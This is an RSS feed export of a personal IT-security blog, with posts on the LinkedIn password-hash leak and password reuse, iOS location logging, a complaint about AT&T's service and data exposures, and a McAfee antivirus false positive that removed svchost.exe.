greg hughes - dot net - IT Security http://www.greghughes.net/rant/ Note that the contents of this site represent my own thoughts and opinions, not those of anyone else - like my employer - or even my dog for that matter. Besides, the dog would post things that make sense. I don't. http://www.greghughes.net/images/gregheadshot1.png greg hughes - dot net - IT Security http://www.greghughes.net/rant/ en-us Greg Hughes Thu, 07 Jun 2012 00:18:14 GMT newtelligence dasBlog 2.1.8015.804 greg@greghughes.net greg@greghughes.net http://www.greghughes.net/rant/Trackback.aspx?guid=888eb255-6c64-47a0-b7a3-c14248b50abd http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,888eb255-6c64-47a0-b7a3-c14248b50abd.aspx http://www.greghughes.net/rant/CommentView,guid,888eb255-6c64-47a0-b7a3-c14248b50abd.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=888eb255-6c64-47a0-b7a3-c14248b50abd

A topic I always enjoy... I post this with the hope that you’ll be able to take something from it as a message to carry to others.

You may have heard that apparently the LinkedIn password list consisting on 16.5 million passwords was stolen and a table of hashed password values has been posted online. You may have received emails from concerned people you know, intended to let you know about the issue. And while it’s a good idea to change your password now, I wanted to take the opportunity to expand on the topic a bit.

One message I consistently try to send is that it’s *always* a good idea to change your passwords regularly to protect against threats such as this and others.

This specific case (as the info is exposed today) doesn’t represent an immediate broad threat for LinkedIn accounts, beyond the ability to potentially build a library of valid passwords sans usernames. But, there is enough information exposed to suggest a need to take reasonable action. In this case, the leaked info is a hashed (encrypted weakly but non-reversible) password list. The version of the list posted online contains only the hashed password values and not the associated user names or email addresses. However, the bad guys could possess that additional info, and just not be releasing it. Yet. We don’t know.

“Hashed” means you cannot simply unencrypt the list and see the actual passwords. Instead you’d have to create your own list or library of possible passwords, create hashes for all of those, and then compare the resulting hashes to the stolen password hash list to find any matches. At that point, you’d know that you have a valid password for *someone’s* account on LinkedIn, but you would not know whose account the password it is associated with (since the login emails were not posted). But again, that account login/email info might be held by the bad guys who posted the hash list, there’s no way to tell for sure.

If the bad guys also have the account names/email addresses, the real risk is that they would do a dictionary discovery “attack” against the hashed password list, correlate the resulting validated passwords to the respective email addresses (LinkedIn uses your email address as the login name) and then use those credentials to try to access LinkedIn -- as well as to attempt to access other sites/services where people might (and likely do) use the same login credentials.

So, yes. Change your passwords, not only on LinkedIn but also on other sites where the same user name and password are used. But do it because it’s always been a good thing to do, not just when credential theft scares happen to come up. And also know that an actual readable list of Linkedin passwords and other login credentials have not been posted in the wild -- at least not yet.



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. LinkedIn, passwords, hashing, and re-using credentials http://www.greghughes.net/rant/PermaLink,guid,888eb255-6c64-47a0-b7a3-c14248b50abd.aspx http://www.greghughes.net/rant/LinkedInPasswordsHashingAndReusingCredentials.aspx Thu, 07 Jun 2012 00:18:14 GMT <p> <i>A topic I always enjoy... I post this with the hope that you’ll be able to take something from it as a message to carry to others.</i> <p> You may have heard that apparently <a href="http://www.infoworld.com/t/hacking/65-million-linkedin-passwords-reportedly-stolen-posted-online-194976" target="_blank">the LinkedIn password list consisting on 16.5 million passwords was stolen</a> and a table of hashed password values has been posted online. You may have received emails from concerned people you know, intended to let you know about the issue. And while it’s a good idea to change your password now, I wanted to take the opportunity to expand on the topic a bit. <p> One message I consistently try to send is that it’s *<b>always</b>* a good idea to change your passwords regularly to protect against threats such as this and others. <p> This specific case (as the info is exposed today) doesn’t represent an immediate broad threat for LinkedIn accounts, beyond the ability to potentially build a library of valid passwords sans usernames. But, there is enough information exposed to suggest a need to take reasonable action. In this case, the leaked info is a hashed (encrypted weakly but non-reversible) password list. The version of the list posted online contains only the hashed password values and not the associated user names or email addresses. However, the bad guys <em>could</em> possess that additional info, and just not be releasing it. Yet. We don’t know. <p> “Hashed” means you cannot simply unencrypt the list and see the actual passwords. Instead you’d have to create your own list or library of possible passwords, create hashes for all of those, and then compare the resulting hashes to the stolen password hash list to find any matches. At that point, you’d know that you have a valid password for *<b>someone’s</b>* account on LinkedIn, but you would not know whose account the password it is associated with (since the login emails were not posted). But again, that account login/email info <em>might</em> be held by the bad guys who posted the hash list, there’s no way to tell for sure. <p> If the bad guys also have the account names/email addresses, the real risk is that they would do a dictionary discovery “attack” against the hashed password list, correlate the resulting validated passwords to the respective email addresses (LinkedIn uses your email address as the login name) and then use those credentials to try to access LinkedIn -- as well as to attempt to access other sites/services where people might (and likely do) use the same login credentials. <p> So, yes. Change your passwords, not only on LinkedIn but also on other sites where the same user name and password are used. But do it because it’s always been a good thing to do, not just when credential theft scares happen to come up. And also know that an actual readable list of Linkedin passwords and other login credentials have not been posted in the wild -- at least not yet. </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,888eb255-6c64-47a0-b7a3-c14248b50abd.aspx IT Security Safe Computing Tech
http://www.greghughes.net/rant/Trackback.aspx?guid=980dd58c-797a-4df1-8854-c48987b7ea13 http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,980dd58c-797a-4df1-8854-c48987b7ea13.aspx http://www.greghughes.net/rant/CommentView,guid,980dd58c-797a-4df1-8854-c48987b7ea13.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=980dd58c-797a-4df1-8854-c48987b7ea13 1 Why is your iPhone/iPad tracking all of your location info? http://www.greghughes.net/rant/PermaLink,guid,980dd58c-797a-4df1-8854-c48987b7ea13.aspx http://www.greghughes.net/rant/WhyIsYourIPhoneiPadTrackingAllOfYourLocationInfo.aspx Thu, 21 Apr 2011 01:25:29 GMT <p> <em><strong>Update: </strong>Apple has <a href="http://www.apple.com/pr/library/2011/04/27location_qa.html">posted a Q&A page with information about the data in question</a>, exactly what that data is, and changes they have planned.</em> </p> <p> This is, well... it's at least very interesting. Which is to say, it’s something that has to make you wonder: Even when core location tracking is not active, <a href="http://radar.oreilly.com/2011/04/apple-location-tracking.html" target="_blank">apparently your iOS4 device is keeping a log of everywhere it goes</a>. Which is to say, everywhere it goes with you. </p> <p> The four images here are a visualization of the info harvested from my own iPad, retrieved automatically from a iTunes backup of my iPad on my Mac (click on each of the images to view full-size). I should note that the locations are actually displayed in a less accurate fashion (visually) by the program that generates the map plots, so as to somewhat avoid any issues and abuse associated with exact location tracking. The information in the data file being analyzed is substantially more accurate and detailed. </p> <p> From cell tower triangulation (it appears this is where the data comes from), you can see a cross country trip I took with a friend from New York to New Mexico, visits to the Denver/Boulder area, and of course a whole slew of travel around the Pacific northwest, where I live. </p> <p> <a href="http://www.greghughes.net/rant/content/binary/screen-capture-map1.png" class="image-link"><img class="linked-to-original" src="http://www.greghughes.net/rant/content/binary/screen-capture-map1-thumb.png" height="282" align="left" width="380" /></a> </p> <p> <a href="http://www.greghughes.net/rant/content/binary/screen-capture-map2.png" class="image-link"><img class="linked-to-original" src="http://www.greghughes.net/rant/content/binary/screen-capture-map2-thumb.png" height="286" align="left" width="380" /></a> </p> <p> <a href="http://www.greghughes.net/rant/content/binary/screen-capture-map3.png" class="image-link"><img class="linked-to-original" src="http://www.greghughes.net/rant/content/binary/screen-capture-map3-thumb.png" height="285" align="left" width="378" /></a> </p> <p> <a href="http://www.greghughes.net/rant/content/binary/screen-capture-map4.png" class="image-link"><img class="linked-to-original" src="http://www.greghughes.net/rant/content/binary/screen-capture-map4-thumb.png" height="285" align="left" width="378" /></a>Also of interest is that I very recently (within the past two months) had my iPad replaced when the sync jack went bad, yet much of the data is from the old iPad in addition to the new one. Obviously when I restored a backup on the old one to the new one, the data was retained as part of the restore. Interesting. Also, there's location info that's recorded on mine, and in some cases I don't see the location data for areas I know I have been to. I'm not completely sure of the rhyme or reason for that.<br /> <br /> Video of the two guys who discovered this and created the visualization program <a href="http://www.youtube.com/watch?v=GynEFV4hsA0" target="_blank">is here</a>. They discuss how this was discovered and go into some detail about the data, where it lives and what they found. Video is via the Where 2.0 conference. </p> <p> Got a 3G iPhone or iPad? You can <a href="http://petewarden.github.com/iPhoneTracker/" target="_blank">run the "iPhone Tracker" app</a> on your own Mac and see what your iTunes backup has sitting around on your computer. If your iTunes backups are encrypted (not a default setting) the data is still there but it's not readable. </p> <p> On it's face and in isolation this is not exactly a huge deal. The location data is not being sent anywhere as far as we know. It resides on your iPad or iPhone (3G models) and on your computer where you sync to iTunes. Well, that's assuming you don't sync to someone else's computer, of course. In that case, they might have your location data available to view and play with. </p> <p> And really, that's why this <em>could</em> be a big deal, on some level. And it's not just that the data is being collected, cataloged, stored and exists, it's that it's <em>been</em> there since iOS4 was released, and we didn't know because no one really noticed until now. Someone had to get curious, poke around, dig into the data and discover it by accident. Makes you wonder what other info might be hanging around in places we don't know about, eh? </p> <p> Hopefully Apple will explain exactly what all the data is, why it's there and how it's used - in great detail. It can't be there for no reason, and I can think of a few cool reasons for collecting the data, but unencrypted and no notification of tracking is a little concerning to me. I'm looking forward to hearing from Apple to understand more. </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,980dd58c-797a-4df1-8854-c48987b7ea13.aspx Apple IT Security Mobile http://www.greghughes.net/rant/Trackback.aspx?guid=2db3adc5-16a4-451d-b426-712331381291 http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,2db3adc5-16a4-451d-b426-712331381291.aspx http://www.greghughes.net/rant/CommentView,guid,2db3adc5-16a4-451d-b426-712331381291.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=2db3adc5-16a4-451d-b426-712331381291 7

And to Apple: I’m sorry, but as good as you make me feel about the world of technology, I just don’t love you enough  to endure AT&T’s bad habits anymore. So, the iPhone has to go, too. And that makes IMAG0002me sad. I truly wish things were different. I almost can’t believe I’m doing this. They say if you love something, let it go free. It’s a brutal suggestion, really.

Let me start out by saying, for those who don’t know, that I’m a security and IT management professional by trade. I’ve held executive and senior management roles for both security and IT functions at a publicly-held company in the financial services space, I’ve consulted with governments and companies large and small on cyber-security issues, and these days I manage security strategy for a Fortune-500 company. So, I have some perspective and reality-based opinions about security and quality.

Let me also say - plainly and clearly - that this blog is where I voice my own opinion about things that are on my mind (as opposed to discussing work-related topics). And my mind is pretty active right now as it concentrates on my personal AT&T Wireless account and the lack of service and security quality the company has delivered over time. In other words, I have some strong opinions on the topic.

This is certainly a bit of a rant, but it’s not a knee-jerk reaction. It’s grounded in reality and reason and I have put some time and thought into my decision.

And enough is enough: I’m done with AT&T.

First AT&T’s reliability and call-handling problems were the issue, and frankly those were bad enough on their own. There are locations where I can *guarantee* calls will drop on my iPhone on the 3G network, every single time. Areas with three to five (out of five) bars of signal strength that suddenly drops the call and goes to zero, before churning around trying to reconnect and eventually coming back with a full signal once (I assume) a tower hand-off finishes. I actually have to tell people that the call will drop in a few seconds and that I will call them back in a couple minutes when the service recovers. They always want to know how I can know that. It’s sad. Coverage has gotten *worse* over the past several months in many areas where I travel, and call reliability has suffered. It’s probably worth noting that the same bad service areas affect my iPad’s 3G data access, as well. So, it’s not just my iPhone.

As if that wasn’t enough, there’s the costs associated with the AT&T service. We pay a premium for iPhone voice and data plans, and get crap for service in return. If I had a buck for every time someone tried to call me and got voice mail, while my phone was sitting in front of me with four or five bars yet never rang once, I’d be able to pay that early termination penalty AT&T requires of it’s customers. It’s bad enough that AT&T sells us this poor service, but it’s even worse that Apple isn’t more publicly vocal and more forceful about getting the problems solved. It’s been three freakin’ years already, for gosh sakes! There is absolutely no excuse.

Then a week ago comes news that AT&T’s iPad registration service was exposing email addresses and validating iPad hardware identifiers, as uncovered by a hacker group with ShootFootan unfortunate name (don’t Google it if you are not already familiar with why it’s unfortunate, just trust me on that one). I, too got the victim-list email from AT&T describing what had happened, six or seven days after the fact. It’s not the actual leak that stinks in this case, it’s the fact that such a design would make it into a Internet service in the first place.

Since then, there’s been a bit of a meta-debate about who’s responsible for what, and all of it is really just details. The fact that the information leak *could* happen in the first place is yet another indicator of why AT&T is a sloppy, careless company when it comes to the services I consume and my personal information. Shame on them. But there’s more…

Then this week comes the straw that broke my proverbial camel’s back, as AT&T’s servers fail massively under load during the iPhone 4 pre-order, and we discover that apparently the company's critical software changes didn’t get tested, and changes got made at the last minute. Oh, and as a result our personal data is being exposed – once again - due to a supposed flaw in the AT&T systems and how they access database records.

Holy cow.

Regardless of the variety of outstanding questions about the exact details and severity of the security situations, the very existence of these problems is more than just problematic.

One has to wonder, if one is being pragmatic and watching the past couple weeks’ activity: What else might they be skimping on that we don’t already know about? If I followed the same practices and didn’t test or validate security and functionality in my line of work, there’s no doubt I’d be gone in a second. Again, simply unacceptable for a huge company and it’s customers, who demand and require trust.

None of this is indicative of a company that practices good, basic security principles as a matter of course. It’s not indicative of a company that strives first for quality. And it’s not the type of company I feel like I can trust anymore.

So, I am quitting you, AT&T. I’d say it’s been nice knowing you, but that would be mostly a lie. So I’ll just walk away and let the past be the past, and focus on the future. Nine-plus years is enough. Good luck to you. I hope you will change, but it’s going to take some serious work, and I just don’t know if you can actually do it. Your track record is not good. Change is hard. Change means pain. And  in the end, most people aren’t willing to endure that process. But maybe you will, and if you do please let me know. I’d like nothing more than to be a happy customer and to write something happy and positive here. I’ll keep my iPad service going with you, since I don’t really have much of a choice and its very existence is part of what makes it possible for me to let the iPhone go. But it’s time for a new phone on a new carrier.

Maybe someday you’ll earn my business back. You might have Apple in your jaws of exclusivity, but not me. For now, you’ve lost my trust and business -- and please realize that you killed an Apple iPhone customer in the process.

And that’s really saying something.

P.S. – A quick final thought to Apple:

I love the hardware. I love the OS. I love the apps. But I can’t stand the service provider, which has failed us for too long now.

I fail to see how you can continue to do exclusive business with a company like AT&T, and I hope you’ll quickly open up options for your customers. Maybe you’re already working on it, which would be a breath of fresh air in this cramped, stuffy, smelly room. I’m sure many will suffer the pains of AT&T to get your hardware and software in your hands, and honestly this is a painful decision for me to make because your phone is something I want and need. But your corporate quality and image is directly tied – even intertwined - to AT&T in the United States, and for a company that stands tall on the ideals of doing things well rather than doing them first, your AT&T relationship is a failure of massive proportions, with quality never measuring up and ability to correct way too lacking. For what it’s worth. I want your products more than any other, but AT&T’s issues have finally crossed a line and have reached the summit of Mt. Unacceptable.

So, what do I do? Please, tell me. Do I wait patiently for a relatively short period of time for another carrier option, or do I just make the move now and use someone else’s hardware?

I am truly sorry to have to leave, Steve. Please, win me back.



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. Dear AT&amp;T: You&rsquo;re fired http://www.greghughes.net/rant/PermaLink,guid,2db3adc5-16a4-451d-b426-712331381291.aspx http://www.greghughes.net/rant/DearATampTYoursquoreFired.aspx Thu, 17 Jun 2010 05:49:31 GMT <p> <em>And to Apple: I’m sorry, but as good as you make me feel about the world of technology, I just don’t love you enough&nbsp; to endure AT&amp;T’s <a href="http://gizmodo.com/5564262/">bad habits</a> anymore. So, the iPhone has to go, too. And that makes <a href="http://www.greghughes.net/rant/content/binary/WindowsLiveWriter/DearATTYourefired_148DF/IMAG0002_2.jpg"><img style="border-bottom: 0px; border-left: 0px; margin: 15px 0px 15px 15px; display: inline; border-top: 0px; border-right: 0px" title="IMAG0002" border="0" alt="IMAG0002" align="right" src="http://www.greghughes.net/rant/content/binary/WindowsLiveWriter/DearATTYourefired_148DF/IMAG0002_thumb.jpg" width="192" height="317"></a>me sad. I truly wish things were different. I almost can’t believe I’m doing this. They say if you love something, let it go free. It’s a brutal suggestion, really.</em> </p> <p> Let me start out by saying, for those who don’t know, that I’m a security and IT management professional by trade. I’ve held executive and senior management roles for both security and IT functions at a publicly-held company in the financial services space, I’ve consulted with governments and companies large and small on cyber-security issues, and these days I manage security strategy for a Fortune-500 company. So, I have some perspective and reality-based opinions about security and quality. </p> <p> Let me also say - plainly and clearly - that this blog is where I voice <em>my own opinion</em> about things that are <em>on my mind</em> (as opposed to discussing work-related topics). And my mind is pretty active right now as it concentrates on my personal AT&amp;T Wireless account and the lack of service and security quality the company has delivered over time. In other words, I have some strong opinions on the topic. </p> <p> This is certainly a bit of a rant, but it’s <em>not</em> a knee-jerk reaction. It’s grounded in reality and reason and I have put some time and thought into my decision. </p> <p> And enough is enough: I’m done with AT&amp;T. </p> <p> First AT&amp;T’s reliability and call-handling problems were the issue, and frankly those were bad enough on their own. There are locations where I can *guarantee* calls will drop on my iPhone on the 3G network, every single time. Areas with three to five (out of five) bars of signal strength that suddenly drops the call and goes to zero, before churning around trying to reconnect and eventually coming back with a full signal once (I assume) a tower hand-off finishes. I actually have to tell people that the call will drop in a few seconds and that I will call them back in a couple minutes when the service recovers. They always want to know how I can know that. It’s sad. Coverage has gotten *worse* over the past several months in many areas where I travel, and call reliability has suffered. It’s probably worth noting that the same bad service areas affect my iPad’s 3G data access, as well. So, it’s not just my iPhone. </p> <p> As if that wasn’t enough, there’s the costs associated with the AT&amp;T service. We pay a premium for iPhone voice and data plans, and get crap for service in return. If I had a buck for every time someone tried to call me and got voice mail, while my phone was sitting in front of me with four or five bars yet never rang once, I’d be able to pay that early termination penalty AT&amp;T requires of it’s customers. It’s bad enough that AT&amp;T sells us this poor service, but it’s even worse that Apple isn’t more publicly vocal and more forceful about getting the problems solved. It’s been <em>three freakin’ years</em> already, for gosh sakes! There is absolutely no excuse. </p> <p> Then a week ago comes news that AT&amp;T’s iPad registration service was <a href="http://gawker.com/5559346/apples-worst-security-breach-114000-ipad-owners-exposed" target="_blank">exposing email addresses</a> and validating iPad hardware identifiers, as uncovered by a hacker group with <em><a href="http://www.greghughes.net/rant/content/binary/WindowsLiveWriter/DearATTYourefired_148DF/ShootFoot_2.jpg"><img style="border-right-width: 0px; margin: 15px 0px 15px 15px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="ShootFoot" border="0" alt="ShootFoot" align="right" src="http://www.greghughes.net/rant/content/binary/WindowsLiveWriter/DearATTYourefired_148DF/ShootFoot_thumb.jpg" width="192" height="244"></a></em>an unfortunate name (don’t Google it if you are not already familiar with why it’s unfortunate, just trust me on that one). I, too got the victim-list email from AT&amp;T describing what had happened, six or seven days after the fact. It’s not the actual leak that stinks in this case, it’s the fact that such a design would make it into a Internet service in the first place. </p> <p> Since then, there’s been a bit of a meta-debate about who’s responsible for what, and all of it is really just details. The fact that the information leak *could* happen in the first place is yet another indicator of why AT&amp;T is a sloppy, careless company when it comes to the services I consume and my personal information. Shame on them. But there’s more… </p> <p> Then <a href="http://gizmodo.com/5564913/" target="_blank">this week comes the straw that broke my proverbial camel’s back</a>, as AT&amp;T’s servers <a href="http://gizmodo.com/5563909/" target="_blank">fail massively</a> under load during the iPhone 4 pre-order, and we discover that apparently the company's critical software changes didn’t get tested, and changes got made at the last minute. Oh, <a href="http://gizmodo.com/5564262/" target="_blank">and as a result our personal data is being exposed</a> – once again - due to a supposed flaw in the AT&amp;T systems and how they access database records. </p> <p> <em>Holy cow.</em> </p> <p> Regardless of the variety of <a href="http://arstechnica.com/security/news/2010/06/atts-ipad-security-breach-could-be-worse-than-initially-thought.ars" target="_blank">outstanding questions about the exact details and severity</a> of the security situations, the very existence of these problems is more than just problematic. </p> <p> One has to wonder, if one is being pragmatic and watching the past couple weeks’ activity: <em>What else might they be skimping on that we don’t already know about? </em>If I followed the same practices and didn’t test or validate security and functionality in my line of work, there’s no doubt I’d be gone in a second. Again, simply unacceptable for a huge company and it’s customers, who demand and require trust. </p> <p> None of this is indicative of a company that practices good, basic security principles as a matter of course. It’s not indicative of a company that strives first for quality. And it’s not the type of company I feel like I can trust anymore. </p> <p> So, I am quitting you, AT&amp;T. I’d say it’s been nice knowing you, but that would be mostly a lie. So I’ll just walk away and let the past be the past, and focus on the future. Nine-plus years is enough. Good luck to you. I hope you will change, but it’s going to take some serious work, and I just don’t know if you can actually do it. Your track record is not good. Change is hard. Change means pain. And&nbsp; in the end, most people aren’t willing to endure that process. But maybe you will, and if you do please let me know. I’d like nothing more than to be a happy customer and to write something happy and positive here. I’ll keep my iPad service going with you, since I don’t really have much of a choice and its very existence is <a href="http://www.greghughes.net/rant/ToIPhoneOrNotToIPhoneThatsTheQuestion.aspx">part of what makes it possible for me to let the iPhone go</a>. But it’s time for a new phone on a new carrier. </p> <p> Maybe someday you’ll earn my business back. You might have Apple in your jaws of exclusivity, but not me. For now, you’ve lost my trust and business -- and please realize that you killed an Apple iPhone customer in the process. </p> <p> And that’s really saying something. </p> <p> <em>P.S. – A quick final thought to Apple: </em> </p> <p> <em>I love the hardware. I love the OS. I love the apps. But I can’t stand the service provider, which has failed us for too long now.</em> </p> <p> <em>I fail to see how you can continue to do <a href="http://money.cnn.com/2010/06/16/technology/att_apple/" target="_blank">exclusive business with a company like AT&amp;T</a>, and I hope you’ll quickly open up options for your customers. Maybe you’re already working on it, which would be a breath of fresh air in this cramped, stuffy, smelly room. I’m sure many will suffer the pains of AT&amp;T to get your hardware and software in your hands, and honestly this is a painful decision for me to make because your phone is something I want and need. But your corporate quality and image is directly tied – even intertwined - to AT&amp;T in the United States, and for a company that stands tall on the ideals of doing things well rather than doing them first, your AT&amp;T relationship is a failure of massive proportions, with quality never measuring up and ability to correct way too lacking. For what it’s worth. I want your products more than any other, but AT&amp;T’s issues have finally crossed a line and have reached the summit of Mt. Unacceptable.</em> </p> <p> <em>So, what do I do? Please, tell me. Do I wait patiently for a relatively short period of time for another carrier option, or do I just make the move now and use someone else’s hardware?</em> </p> <p> <em>I am truly sorry to have to leave, Steve. Please, win me back.</em> </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,2db3adc5-16a4-451d-b426-712331381291.aspx Apple IT Security Mobile Tech Things that Suck
http://www.greghughes.net/rant/Trackback.aspx?guid=b62dce32-b58d-4c3b-886d-073c53406327 http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,b62dce32-b58d-4c3b-886d-073c53406327.aspx http://www.greghughes.net/rant/CommentView,guid,b62dce32-b58d-4c3b-886d-073c53406327.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=b62dce32-b58d-4c3b-886d-073c53406327 1

Many users of McAfee's virus scanning products are experiencing some real pain today due to a false positive virus alert (for the wecorl.a virus) that is resulting in dcom error reboots and in many cases the removal of the valid Windows svchost.exe from affected systems.

Despite a massive slew of articles and posts made on web sites today saying a new virus is in the wild and infecting computers (typically referring to this is a zero-day vulnerability), this is not in fact a virus outbreak, as anyone who knows how to use Google and has a remotely curious mind can discover in a matter of seconds. It’s an antivirus false-positive. The wecorl.a trojan is a couple years old, and this is not it. Even if it was a virus, it would not be zero-day.

In a nutshell, McAfee made a big mess with their AV update early this morning, and they are working feverishly to fix it. Read on.

First of all, if you're affected by the problem described below, information about a workaround fix and an update is available from McAfee at the McAfee Threat Center web site:

One of my own computers fell victim to this today, and I've been fighting with it since. I just got it back online, restored to normal and fully operational. My problem started at about 7am today and so I was figuring it out on my own, but the instructions McAfee has provided for the workaround/fix (linked above) are basically the same thing.

wecorl A DAT (virus definition 5958) file that appears was released earlier today has an issue that causes the valid Microsoft svchost.exe critical system file to be flagged as infected. It's not infected, though. This appears to impact primarily Windows XP SP3 computers, but it could be broader than that. As a result of the false flagging of the file, the McAfee AV software takes action, which can include doing nothing, quarantining the file, or in some cases removing it completely (that's what happened to mine).

If the file is quarantined or deleted, Windows stops working normally and a lot of the typical Windows functionality just isn't there anymore. Things like start menus, drag and drop capabilities, copy and paste in Explorer, and a whole lot more. You can still open Task Manager and launch new tasks manually, and the CMD window interface (command line shell) works just like always, so it's possible to get around to fix it up.

If you are running McAfee Virus Scan and have a signature file version 5958 (open the "about" dialog and look for the DAT version), then it appears you are affected. Rolling back to 5957.0000 (which was issued 4/20) will resolve the issue. There is also an "extra.dat" file available that can be dropped into the McAfee AV scanner's DAT directory while in safe mode, and then the computer should be restarted. Or if you're a business using EPO to centrally manage your AV system, you can push it out with that.

But if your svchost.exe file has been quarantined or deleted, you'll have to do some hands-on repair (at east for now, until a better solution is put together). The link at the top of this article walks you through what's needed.

This is a serious challenge today for McAfee. Their web sites appear to be badly overloaded and I have friends in the business who are waiting on hold with McAfee for extended periods on time. In speaking with people working at other (huge) companies, it's apparent the impact is huge and widespread. Thousands of people who should be working are dead in the water now, so to speak, with no computer to do their work on.

I hate to think what the financial impact of this is. It's got to be huge. Follow the link above and check it for updates from McAfee as time goes on.



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. The wecorl.a virus alert for McAfee users today is a false-positive - Bad DAT update file is the cause http://www.greghughes.net/rant/PermaLink,guid,b62dce32-b58d-4c3b-886d-073c53406327.aspx http://www.greghughes.net/rant/TheWecorlaVirusAlertForMcAfeeUsersTodayIsAFalsepositiveBadDATUpdateFileIsTheCause.aspx Wed, 21 Apr 2010 20:07:18 GMT <p> Many users of McAfee's virus scanning products are experiencing some real pain today due to a false positive virus alert (for the wecorl.a virus) that is resulting in dcom error reboots and in many cases the removal of the valid Windows svchost.exe from affected systems. </p> <p> Despite a massive slew of articles and posts made on web sites today saying a new virus is in the wild and infecting computers (typically referring to this is a zero-day vulnerability), <em>this is not in fact a virus outbreak</em>, as anyone who knows how to use Google and has a remotely curious mind can discover in a matter of seconds. It’s an antivirus false-positive. The wecorl.a trojan is a couple years old, and this is not it. Even if it was a virus, it would not be zero-day. </p> <p> In a nutshell, McAfee made a big mess with their AV update early this morning, and they are working feverishly to fix it. Read on.<em> <br> </p> > <p> <em>First of all, if you're affected by the problem described below, information about a workaround fix and an update is available from McAfee at the McAfee Threat Center web site:<br> </em> </p> <ul> <li> <a href="http://vil.nai.com/vil/5958_false.htm" target="_blank">False positive detection of w32/wecorl.a in 5958 DAT - http://vil.nai.com/vil/5958_false.htm</a> </li> </ul> <p> One of my own computers fell victim to this today, and I've been fighting with it since. I just got it back online, restored to normal and fully operational. My problem started at about 7am today and so I was figuring it out on my own, but the instructions McAfee has provided for the workaround/fix (linked above) are basically the same thing. </p> <p> <img style="border-right-width: 0px; margin: 0px 0px 10px 15px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="wecorl" border="0" alt="wecorl" align="right" src="http://www.greghughes.net/rant/content/binary/WindowsLiveWriter/The.avirusalertforMcAfeeuserstodayisafal_BF78/wecorl_3.png" width="487" height="53"> A DAT (virus definition 5958) file that appears was released earlier today has an issue that causes the valid Microsoft svchost.exe critical system file to be flagged as infected. It's not infected, though. This appears to impact primarily Windows XP SP3 computers, but it could be broader than that. As a result of the false flagging of the file, the McAfee AV software takes action, which can include doing nothing, quarantining the file, or in some cases removing it completely (that's what happened to mine). </p> <p> If the file is quarantined or deleted, Windows stops working normally and a lot of the typical Windows functionality just isn't there anymore. Things like start menus, drag and drop capabilities, copy and paste in Explorer, and a whole lot more. You can still open Task Manager and launch new tasks manually, and the CMD window interface (command line shell) works just like always, so it's possible to get around to fix it up. </p> <p> If you are running McAfee Virus Scan and have a signature file version 5958 (open the "about" dialog and look for the DAT version), then it appears you are affected. Rolling back to 5957.0000 (which was issued 4/20) will resolve the issue. There is also an "extra.dat" file available that can be dropped into the McAfee AV scanner's DAT directory while in safe mode, and then the computer should be restarted. Or if you're a business using EPO to centrally manage your AV system, you can push it out with that. </p> <p> But if your svchost.exe file has been quarantined or deleted, you'll have to do some hands-on repair (at east for now, until a better solution is put together). The link at the top of this article walks you through what's needed. </p> <p> This is a serious challenge today for McAfee. Their web sites appear to be badly overloaded and I have friends in the business who are waiting on hold with McAfee for extended periods on time. In speaking with people working at other (huge) companies, it's apparent the impact is huge and widespread. Thousands of people who should be working are dead in the water now, so to speak, with no computer to do their work on. </p> <p> I hate to think what the financial impact of this is. It's got to be huge. Follow the link above and check it for updates from McAfee as time goes on. </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,b62dce32-b58d-4c3b-886d-073c53406327.aspx IT Security Tech
http://www.greghughes.net/rant/Trackback.aspx?guid=06dfce3e-a546-4543-9fae-4af4cd622891 http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,06dfce3e-a546-4543-9fae-4af4cd622891.aspx http://www.greghughes.net/rant/CommentView,guid,06dfce3e-a546-4543-9fae-4af4cd622891.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=06dfce3e-a546-4543-9fae-4af4cd622891

One of the upcoming online summits at BrightTalk is the Cloud Security Summit, which consists of a bunch of web conferences on September 30th.

You can visit the summit overview and schedule page here.

Lots of topics around security, legal issues and compliance in the context of cloud computing. Good stuff. Recently on RunAs Radio we have have had a couple discussions where cloud computing came up, too.



